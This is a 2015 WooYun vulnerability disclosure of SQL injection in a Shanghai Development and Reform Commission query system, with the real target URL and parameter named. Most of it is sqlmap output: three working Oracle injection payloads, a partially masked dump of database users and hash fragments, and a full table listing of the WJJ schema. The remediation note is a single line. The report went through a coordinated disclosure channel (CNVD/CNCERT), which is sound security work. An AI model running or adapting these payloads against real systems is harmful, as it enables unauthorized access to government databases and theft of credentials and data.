当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090280

漏洞标题:上海市发改委某查询系统SQL注入

相关厂商:上海市发改委

漏洞作者: RedFree

提交时间:2015-01-07 11:34

修复时间:2015-02-21 11:36

公开时间:2015-02-21 11:36

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-07: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经确认,细节仅向厂商公开
2015-01-22: 细节向核心白帽子及相关领域专家公开
2015-02-01: 细节向普通白帽子公开
2015-02-11: 细节向实习白帽子公开
2015-02-21: 细节向公众公开

简要描述:

上海市发改委某查询系统对查询的参数过滤不严格,导致SQL注入。

详细说明:

查询页:http://jgjc.shdrc.gov.cn/gzcx/listFbXX.do

Place: POST
Parameter: xkzfbbm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sfdw=%E4%B8%8A%E6%B5%B7%E5%B8%82%E4%BB%B7%E6%A0%BC%E8%AE%A4%E8%AF%8
1%E4%B8%AD%E5%BF%83&xkzfbbm=00002021000' AND 5786=5786 AND 'BAQG'='BAQG&yxqz=201
6%E5%B9%B406%E6%9C%88&dwmc=&MaxPage=17
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: sfdw=%E4%B8%8A%E6%B5%B7%E5%B8%82%E4%BB%B7%E6%A0%BC%E8%AE%A4%E8%AF%8
1%E4%B8%AD%E5%BF%83&xkzfbbm=00002021000' AND 6859=(SELECT UPPER(XMLType(CHR(60)|
|CHR(58)||CHR(113)||CHR(111)||CHR(110)||CHR(105)||CHR(113)||(SELECT (CASE WHEN (
6859=6859) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(119)||CHR(119)|
|CHR(113)||CHR(62))) FROM DUAL) AND 'uHJf'='uHJf&yxqz=2016%E5%B9%B406%E6%9C%88&d
wmc=&MaxPage=17
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: sfdw=%E4%B8%8A%E6%B5%B7%E5%B8%82%E4%BB%B7%E6%A0%BC%E8%AE%A4%E8%AF%8
1%E4%B8%AD%E5%BF%83&xkzfbbm=00002021000' AND 9986=DBMS_PIPE.RECEIVE_MESSAGE(CHR(
117)||CHR(71)||CHR(74)||CHR(68),5) AND 'HEEl'='HEEl&yxqz=2016%E5%B9%B406%E6%9C%8
8&dwmc=&MaxPage=17
---
[15:19:55] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[15:19:55] [INFO] fetching current database
[15:19:55] [INFO] resumed: WJJ
[15:19:55] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'WJJ'


当前数据库账号的权限很高:

mask 区域
*****MS: Or*****
*****abase on Oracle):*****
*****MS: Or*****
***** '*****
*****is DBA:*****
*****MS: Or*****
*****tem users pa*****
*****_USER*****
*****d hash*****
*****RATOR_RO*****
*****d hash*****
*****_ROLE *****
*****d hash*****
*****C [1*****
*****: CBBE049*****
*****NECT*****
*****d hash*****
*****SER [*****
*****d hash*****
*****_FGWW*****
*****: 4872ABF*****
*****BA *****
*****d hash*****
*****NMP *****
*****: 141EB2C*****
*****TALOG_R*****
*****d hash*****
*****IP *****
*****: CE4A36B*****
*****IENT *****
*****d hash*****
*****ATALOG_*****
*****d hash*****
*****SYS *****
*****: 66F4EF5*****
*****DATABAS*****
*****d hash*****
*****OA [*****
*****: 79DED9E*****
*****FGWWW*****
*****: 808E498*****
*****EM_STATI*****
*****d hash*****
*****_USER_R*****
*****d hash*****
*****GL [*****
*****: 3C89E1F*****
*****N_ROLE*****
*****d hash*****
*****DATABAS*****
*****d hash*****
*****ADMIN*****
*****d hash*****
*****DEPLO*****
*****d hash*****
*****UGPRIV*****
*****d hash*****
*****DPRIV*****
*****d hash*****
*****YSPRI*****
*****d hash*****
*****RPRIV *****
*****d hash*****
*****C [1*****
*****: D55C862*****
*****TEST *****
*****: AE8D91B*****
*****TEST *****
*****: 63B88CB*****
*****MINISTRA*****
*****d hash*****
*****USER *****
*****d hash*****
*****VIEW *****
*****: 5D598A9*****
*****L [1*****
*****: FFF1E5C*****
*****012 [*****
*****: 2A37EE8*****
*****DVISO*****
*****d hash*****
*****ONITO*****
*****d hash*****
*****DBA [*****
*****d hash*****
*****USER *****
*****d hash*****
*****RACE_U*****
*****d hash*****
*****PSYS*****
*****hash: i*****
*****E_OCM*****
*****: 6D17CF1*****
*****FGW *****
*****: DC54977*****
*****_FGWW*****
*****: 066FC65*****
*****LN [*****
*****: 4A3BA55*****
*****TAT [*****
*****: 5D44E3B*****
*****LIC *****
*****d hash*****
*****TALOG_OW*****
*****d hash*****
*****RCE [*****
*****d hash*****
*****ER_ADM*****
*****d hash*****
*****DE *****
*****: E1E1402*****
*****TALOG_R*****
*****d hash*****
*****MS *****
*****: 23C574F*****
*****TEST*****
*****: 3316873*****
*****YS *****
*****: F337971*****
*****MAN *****
*****: E213F6D*****
*****TEM *****
*****: BD9800F*****
*****SHOW *****
*****: 4884228*****
*****T [1*****
*****: A8E2250*****
*****SYS *****
*****: 3DF26A8*****
*****FICE *****
*****: 19908F8*****
*****JJ *****
*****: 799539C*****
*****2_TES*****
*****: E8D618C*****
*****N_ROLE*****
*****d hash*****
*****YS [*****
*****: 7C9BA36*****
*****S [1*****
*****: 2C8224E*****
*****T [1*****
*****: 822D434*****
*****K [1*****
*****: 1E83E59*****
*****TEST *****
*****: C316F67*****
*****G [1*****
*****: 8393B72*****
*****012 [*****
*****: 74BE52E*****
*****L [1*****
*****: 43B64C2*****
*****Y [1*****
*****: FDF5F81*****
*****P [1*****
*****: 99EE5BD*****

漏洞证明:

Database: WJJ
[90 tables]
+------------------------+
| CBSB_SHYJ |
| CBSB_XMQD |
| CBSB_XMQD_TEMP |
| CBSB_ZB |
| CBSB_ZB_TEMP |
| CBSB_ZC |
| CBSB_ZC_TEMP |
| DWJB_WHB |
| DWSX_WHB |
| FBTG_DWB |
| FBTG_ZB |
| GBF_WHB |
| GZFW_HMD |
| GZFW_XKZFB |
| GZFW_XKZZB |
| HZB |
| IP_WHB |
| LBQYFL |
| LICENSE_CONFIG |
| LOCKLOG |
| MESSAGEV2 |
| MSGRTYPE |
| NSKB_CONFIG |
| OTHERUSER |
| PZBM_WHB |
| PZQXFL |
| PZQX_WHB |
| QXZL |
| SFDW_CONFIG |
| SFDW_ZB |
| SFDW_ZB_LOG |
| SFDW_ZB_TEMP |
| SFDX_WHB |
| SFLB_WHB |
| SFNS_JL_WHB |
| SFNS_ND_WHB |
| SFNS_REJECTION_ITEM |
| SFNS_REJECTION_UNIT |
| SFNS_SHYJ |
| SFNS_XMQD |
| SFNS_XMQD_TEMP |
| SFNS_ZB |
| SFNS_ZB_TEMP |
| SFNS_ZT |
| SFWJ_ZB |
| SFXKZ_HZ_ZB |
| SFXKZ_PRINT |
| SFXKZ_SFXM |
| SFXKZ_SFXM_LOG |
| SFXKZ_SFXM_TEMP |
| SFXKZ_ZB |
| SFXKZ_ZB_LOG |
| SFXMTJ |
| SFXM_CONFIG |
| SFXM_SFDX |
| SFXM_ZB |
| SFXM_ZB_LOG |
| SFXZSQ |
| SFXZ_WHB |
| SH_CH |
| SH_DEPARTMENT |
| SH_FEEAGENCY_DATA |
| SH_FEEDIMCOIN |
| SH_HISTORY |
| SH_LICENSEANNUAL |
| SH_LICENSESTAT |
| SH_LICENSESTAT_VARIETY |
| SH_MID |
| SH_QY |
| SH_SFXM |
| TEMP_SHBM_TO_GJBM |
| TEMP_SHBM_TO_GJBM_WZ |
| TEST |
| TJYMWHB |
| USR_FILES |
| USR_MAIL |
| WJJLOCKLOG |
| WJJ_NSHZ |
| XKZ_PRINT_RECORD |
| XKZ_PRINT_SFXM |
| XMBD_WHB |
| XTBM_WHB |
| XTFL |
| XTXMFL |
| XZQYFL |
| XZQY_WHB |
| YHJB_WHB |
| YHJB_YMMC_WHB |
| YHMAILS |
| YH_WHB |
+------------------------+

修复方案:

过滤参数。

版权声明:转载请注明来源 RedFree@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-12 09:12

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置

最新状态:

暂无


漏洞评价:

评论